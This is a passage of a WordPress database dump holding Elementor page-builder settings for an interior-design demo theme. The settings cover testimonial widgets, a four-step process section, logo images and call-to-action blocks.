solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3200,4764,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(3201,4764,'_elementor_pro_version','3.8.1'),(3202,4765,'_wp_page_template','elementor_header_footer'),(3203,4765,'_elementor_edit_mode','builder'),(3204,4765,'_elementor_template_type','wp-page'),(3205,4765,'_elementor_version','3.8.1'),(3206,4765,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 